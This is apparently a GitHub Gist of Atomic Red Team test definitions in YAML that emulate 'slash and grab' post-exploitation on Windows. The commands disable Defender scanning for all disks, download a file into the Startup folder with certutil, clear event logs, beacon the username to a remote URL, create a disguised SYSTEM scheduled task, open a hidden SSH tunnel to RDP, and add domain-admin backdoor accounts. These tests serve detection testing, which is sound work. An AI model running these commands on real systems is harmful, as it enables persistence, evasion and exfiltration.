Last active
February 27, 2024 14:48
-
-
Save MHaggis/8571e31b2668af21d978863ef1c5b76d to your computer and use it in GitHub Desktop.
Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
attack_technique: Many | |
display_name: Slash and Grab Post-Ex | |
atomic_tests: | |
- name: Add all logical disks to Windows Defender exclusion list | |
description: | | |
This test adds all logical disks on the system to the Windows Defender exclusion list. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid} | |
name: powershell | |
elevation_required: true | |
- name: certutil download (urlcache) | |
description: | | |
Use certutil -urlcache argument to download a file from the web | |
supported_platforms: | |
- windows | |
input_arguments: | |
remote_file: | |
description: URL of file to copy | |
type: url | |
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi | |
local_path: | |
description: Local path to place file | |
type: path | |
default: c:\mpyutild.msi | |
executor: | |
command: | | |
cmd /c certutil -urlcache -f #{remote_file} #{local_path} | |
move #{local_path} "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" | |
cleanup_command: | | |
del #{local_path} >nul 2>&1 | |
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\#{local_path}" >nul 2>&1 | |
name: command_prompt | |
- name: Clear Logs | |
description: | | |
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. | |
supported_platforms: | |
- windows | |
input_arguments: | |
log_name: | |
description: Windows Log Name, ex System | |
type: string | |
default: System | |
executor: | |
command: | | |
wevtutil cl #{log_name} | |
name: command_prompt | |
elevation_required: true | |
- name: UserName Checkin | |
description: | | |
This test checks in with a remote server using PowerShell. | |
supported_platforms: | |
- windows | |
input_arguments: | |
url: | |
description: URL to check in with | |
type: url | |
default: https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName | |
executor: | |
command: | | |
powershell -c "Invoke-WebRequest -Uri #{url}" | |
name: command_prompt | |
elevation_required: false | |
- name: Create Scheduled Task | |
description: | | |
This test creates a scheduled task using SCHTASKS command. | |
supported_platforms: | |
- windows | |
input_arguments: | |
task_name: | |
description: Name of the task | |
type: string | |
default: "\\Microsoft\\Windows\\Wininet\\UserCache_1708535250863" | |
task_run: | |
description: Task to be run | |
type: string | |
default: "C:\\Windows\\Help\\Help\\SentinelUI.exe" | |
executor: | |
command: | | |
SCHTASKS /Create /TN "#{task_name}" /TR "#{task_run}" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05 | |
cleanup_command: | | |
SCHTASKS /Delete /TN "#{task_name}" /F | |
name: command_prompt | |
elevation_required: true | |
- name: Download PuTTY and setup SSH tunnel | |
description: | | |
This test downloads PuTTY from a URL and sets up an SSH tunnel. | |
supported_platforms: | |
- windows | |
input_arguments: | |
host: | |
description: SSH host | |
type: string | |
default: example.com | |
executor: | |
command: | | |
powershell -c "Invoke-WebRequest -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile C:\putty\putty.exe" | |
powershell -c "$r = 'C:\putty\'; $e = $r + 'putty.exe'; $g = '#{host}'; $args = @('tunnel@' + $g, '-P 443', '-N', '-ssh', '-L 9595:localhost:3389'); (Start-Process -FilePath $e -ArgumentList $args -PassThru -WindowStyle Hidden).Id" | |
cleanup_command: | | |
powershell -c "Stop-Process -Name putty -Force" | |
powershell -c "Remove-Item -Path C:\putty\putty.exe -Force" | |
name: powershell | |
elevation_required: false | |
- name: Download and Install Chrome Remote Desktop Host | |
description: | | |
This test downloads Chrome Remote Desktop Host from a URL and installs it. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
$path = Join-Path -Path $env:ProgramData -ChildPath '1.msi' | |
(New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $path) | |
Start-Process 'msiexec.exe' -ArgumentList "/i `"$path`"" -Wait | |
cleanup_command: | | |
Remove-Item -Path $env:ProgramData\1.msi -Force | |
name: powershell | |
elevation_required: true | |
- name: Add Users and Assign Groups | |
description: | | |
This test adds users to the domain and assigns them to various groups. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
net user /add default test@2021! /domain | |
net group "Domain Admins" default /add /domain | |
net group "Enterprise Admins" default /add /domain | |
net group "Remote Desktop Users" default /add /domain | |
net group "Group Policy Creator Owners" default /add /domain | |
net group "Schema Admins" default /add /domain | |
net user default /active:yes /domain | |
net user /add default1 test@2021! /domain | |
net user /add default1 test@2021! /domain | |
net user /add oldadmin Pass8080!! | |
net localgroup administrators oldadmin /add | |
net user temp 123123qwE /add /domain | |
net group "Domain Admins" temp /add /domain | |
name: command_prompt | |
elevation_required: true | |
cleanup_command: | | |
net user default /delete /domain | |
net group "Domain Admins" default /delete /domain | |
net group "Enterprise Admins" default /delete /domain | |
net group "Remote Desktop Users" default /delete /domain | |
net group "Group Policy Creator Owners" default /delete /domain | |
net group "Schema Admins" default /delete /domain | |
net user default1 /delete /domain | |
net user oldadmin /delete | |
net localgroup administrators oldadmin /delete | |
net user temp /delete /domain | |
net group "Domain Admins" temp /delete /domain |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment